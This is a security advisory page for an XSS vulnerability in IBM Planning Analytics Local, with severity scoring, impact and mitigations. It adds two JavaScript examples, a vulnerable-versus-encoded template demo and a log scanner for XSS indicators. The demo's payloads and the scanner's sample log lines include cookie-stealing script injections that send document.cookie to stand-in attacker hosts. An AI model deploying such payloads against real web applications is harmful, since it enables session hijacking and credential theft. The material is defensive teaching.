
CVE-2025-36132: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in IBM Planning Analytics Local

Medium
Tags: Vulnerability, CVE-2025-36132, cve, cwe-79
Published: Tue Sep 30 2025 (09/30/2025, 19:41:19 UTC)
Source: CVE Database V5
Vendor/Project: IBM
Product: Planning Analytics Local

Description

IBM Planning Analytics Local 2.0.0 through 2.0.106 and 2.1.0 through 2.1.13 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

AI-Powered Analysis

AI analysis last updated: 09/30/2025, 20:45:17 UTC

Technical Analysis

CVE-2025-36132 is a medium-severity cross-site scripting (XSS) vulnerability in IBM Planning Analytics Local versions 2.0.0 through 2.0.106 and 2.1.0 through 2.1.13. The root cause is improper neutralization of input during web page generation (CWE-79): a value supplied by an authenticated user is written into the web UI without output encoding appropriate to the HTML context it lands in, so a browser that renders the affected page treats attacker-controlled text as markup and executes the JavaScript embedded in it. Because that script runs in the application's own origin, it inherits the victim's session: it can read whatever the page can read, call the application's endpoints with the victim's cookies, and rewrite the UI (for example, replacing a form or capturing input), which is the "credentials disclosure within a trusted session" that the IBM description refers to.

The CVSS 3.1 vector is AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, base score 5.4 (medium). The attack is reachable over the network with low complexity, and the privileges required are low: the attacker needs a valid account but no elevated role. User interaction is required because a victim must load the page that contains the injected content. Scope is changed because the vulnerable component is the server-side page generation while the impact lands in the victim's browser, a different security authority. Confidentiality and integrity impact are rated low and availability is unaffected.

No exploitation in the wild is reported at the time of writing. If exploited, the realistic outcomes are session hijacking, credential theft through a manipulated UI, and unauthorized actions performed in the victim's name. IBM Planning Analytics Local is a business analytics and planning product used for financial and operational planning, so the data exposed to such a script is typically sensitive.
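
The CWE-79 pattern described above, shown as an added example that is not part of the original advisory and is not IBM's code: a template that concatenates an authenticated user's input straight into markup, beside the same template with context-appropriate output encoding. The fragment layout, field names, the `attacker.example` host and both payloads are constructed for illustration and are not taken from Planning Analytics.

```javascript
// Added example, not IBM code: the CWE-79 pattern behind this CVE, shown as a
// vulnerable template beside its fixed form. Field names, the attacker host
// and the payloads are constructed for illustration.

// Encode the characters that can change parsing context inside an HTML text
// node or a double-quoted attribute value. Encoding happens at output time,
// for the context the value lands in, which is exactly what CWE-79 says is
// missing in the vulnerable code.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: a value typed by an authenticated user (a comment, a display
// name) is concatenated straight into markup that other users' browsers parse.
function renderCommentVulnerable(author, text) {
  return `<div class="comment" data-author="${author}">${text}</div>`;
}

// Hardened: every untrusted value is encoded for the context it is placed in.
function renderCommentHardened(author, text) {
  return `<div class="comment" data-author="${encodeHtml(author)}">${encodeHtml(text)}</div>`;
}

// Demo check: did untrusted input manage to introduce an element or an
// inline event handler into the fragment? A real test would load the
// fragment into a DOM; this regex check is enough to show the difference.
function introducesMarkup(html) {
  return /<(?:script|img|svg|iframe|object)\b/i.test(html)
      || /<[^>]*\son\w+\s*=/i.test(html);
}

// Constructed attacker inputs: the first breaks out of a text node, the
// second closes the attribute value and opens a script element.
const PAYLOAD_TEXT = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';
const PAYLOAD_ATTR = '"><script>alert(document.cookie)</script><b x="';

// For each rendering, report whether the payload became live markup.
function demo() {
  return {
    vulnerableText: introducesMarkup(renderCommentVulnerable('alice', PAYLOAD_TEXT)),
    vulnerableAttr: introducesMarkup(renderCommentVulnerable(PAYLOAD_ATTR, 'hi')),
    hardenedText: introducesMarkup(renderCommentHardened('alice', PAYLOAD_TEXT)),
    hardenedAttr: introducesMarkup(renderCommentHardened(PAYLOAD_ATTR, 'hi')),
  };
}

console.log(demo());
```

The two payloads matter for different reasons: the text-node payload needs no quote characters at all, so filters that only strip quotes do not stop it, while the attribute payload shows why the encoding must cover `"` and not just `<` and `>`. The `document.cookie` read in the first payload only succeeds when the session cookie lacks the HttpOnly flag, which is why that flag is a worthwhile compensating control even though it does not fix the injection.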

Potential Impact

For European organizations using IBM Planning Analytics Local, this vulnerability puts the confidentiality and integrity of financial and operational planning data at risk. An attacker with a valid user account can inject script that, when another user views the affected page, steals that user's session token or credentials, or silently changes the data shown in the web interface. The consequences range from unauthorized disclosure to manipulated planning figures and fraudulent financial reporting, which can distort business decisions and damage trust in the numbers. Where the instance processes personal data, or is shared by several business units or tenants, a compromise may also have GDPR consequences, including fines and reputational damage. The authentication requirement limits the attack surface to insiders and compromised accounts, but the low attack complexity and network reachability mean that a single phished or reused password is enough to put an attacker in a position to exploit it. The absence of known exploits makes immediate widespread attacks unlikely but does not rule out targeted attacks on high-value European enterprises.

Mitigation Recommendations

To mitigate this vulnerability, European organizations should:

1) Apply the fixed versions from IBM's security bulletin as soon as they are available; at the time of this analysis the CVE record carried no patch links, so check IBM's bulletin for Planning Analytics Local directly rather than relying on this record.
2) Enforce strict access controls and monitor accounts for suspicious activity. Exploitation requires an authenticated account, so a compromised or shared login is the realistic entry point.
3) Put a web application firewall in front of the web UI with rules for script injection (encoded `<script`, inline event-handler attributes such as `onerror=`, `javascript:` URIs). Treat this as a stopgap: signature rules are bypassed by encoding variations and do not supply the missing output encoding.
4) Run security awareness training against the phishing that could yield the credentials an attacker needs.
5) The application's own output encoding cannot be fixed by a customer, so harden what an injected script can reach instead, at the reverse proxy or in the application configuration where the deployment allows it: mark session cookies HttpOnly and Secure so script cannot read them through `document.cookie`, and set a Content-Security-Policy that disallows inline script and restricts where the page may send requests. Neither replaces the vendor fix; both narrow the blast radius.
6) Monitor web-server and application logs for requests whose parameters contain encoded markup, event-handler strings or `javascript:` URIs, decoding percent-encoding before matching because payloads are often double-encoded.
7) Isolate the Planning Analytics Local environment from less trusted networks and restrict access to trusted users only.
8) Prepare incident response plans that cover XSS exploitation: which sessions to invalidate, how to locate and remove stored payloads, and which accounts to reset.
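
The log review in recommendation 6, as an added example that is not part of the original analysis and not a tool from IBM or the site: a small scanner that parses combined-format access-log lines, fully URL-decodes the request path, and flags lines that match common XSS indicators. The log lines, the `/app/...` paths, client addresses and the `evil.example` host are all constructed for this example; real Planning Analytics Local request paths will differ.

```javascript
// Added example, not IBM code: scan web-server access logs for the request
// patterns an XSS probe or payload typically leaves behind. The log lines,
// paths and hosts below are constructed; none are from Planning Analytics.

// Indicators are applied to the URL-decoded request path and query string.
const XSS_INDICATORS = [
  { name: 'script-tag',      re: /<\s*script\b/i },
  { name: 'event-handler',   re: /\bon(?:error|load|mouseover|focus|click)\s*=/i },
  { name: 'javascript-uri',  re: /javascript\s*:/i },
  { name: 'svg-or-iframe',   re: /<\s*(?:svg|iframe|object|embed)\b/i },
  { name: 'expression-call', re: /\b(?:alert|prompt|confirm|eval)\s*\(/i },
];

// Decode percent-encoding repeatedly, because payloads are often
// double-encoded to slip past naive filters; stop at a fixed depth and keep
// the last good value if decoding throws on malformed input.
function fullyDecode(s) {
  let cur = s.replace(/\+/g, ' ');
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Combined log format: host ident user [time] "method path proto" status bytes "referer" "agent"
const LINE_RE = /^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;  // malformed or truncated lines are skipped, not guessed at
  return { ip: m[1], user: m[2], time: m[3], method: m[4], path: m[5], status: m[6], agent: m[7] };
}

// Return a finding for one line, or null when nothing matched.
function scanLine(line) {
  const rec = parseLine(line);
  if (!rec) return null;
  const decoded = fullyDecode(rec.path);
  const indicators = XSS_INDICATORS.filter((ind) => ind.re.test(decoded)).map((ind) => ind.name);
  if (indicators.length === 0) return null;
  return { ip: rec.ip, user: rec.user, time: rec.time, path: decoded, indicators };
}

function scanLog(lines) {
  return lines.map(scanLine).filter((f) => f !== null);
}

// Constructed sample log: one benign request, a plain payload, a
// double-encoded payload, a javascript: URI probe, and a malformed line.
const SAMPLE_LOG = [
  '10.0.0.5 - alice [30/Sep/2025:10:12:01 +0000] "GET /app/dashboard HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '10.0.0.9 - bob [30/Sep/2025:10:13:44 +0000] "GET /app/report?name=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 884 "-" "Mozilla/5.0"',
  '10.0.0.9 - bob [30/Sep/2025:10:14:02 +0000] "POST /app/comment?text=%253Cimg%2520src%253Dx%2520onerror%253Dfetch(%2527//evil.example/%2527%252Bdocument.cookie)%253E HTTP/1.1" 302 0 "-" "curl/8.0"',
  '10.0.0.12 - - [30/Sep/2025:10:15:10 +0000] "GET /app/help?q=javascript%3Aalert(1) HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
  'this line is not in combined format',
];

function findings() {
  return scanLog(SAMPLE_LOG);
}

console.log(JSON.stringify(findings(), null, 2));
```

Two caveats a practitioner would want: only GET parameters and the path appear in an access log, so a payload submitted in a POST body (the likely route for a stored XSS in a form field) is invisible here unless the application or proxy logs request bodies; and the 302 on the double-encoded POST in the sample shows why status codes cannot be used to filter, since a successful store looks like any other redirect. The indicator list is deliberately short and should be tuned against the application's legitimate traffic before it drives alerts.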


Technical Details

Data Version
5.1
Assigner Short Name
ibm
Date Reserved
2025-04-15T21:16:19.007Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 68dc412b4167b98bea01ab91

Added to database: 9/30/2025, 8:44:27 PM

Last enriched: 9/30/2025, 8:45:17 PM

Last updated: 10/1/2025, 12:09:20 AM

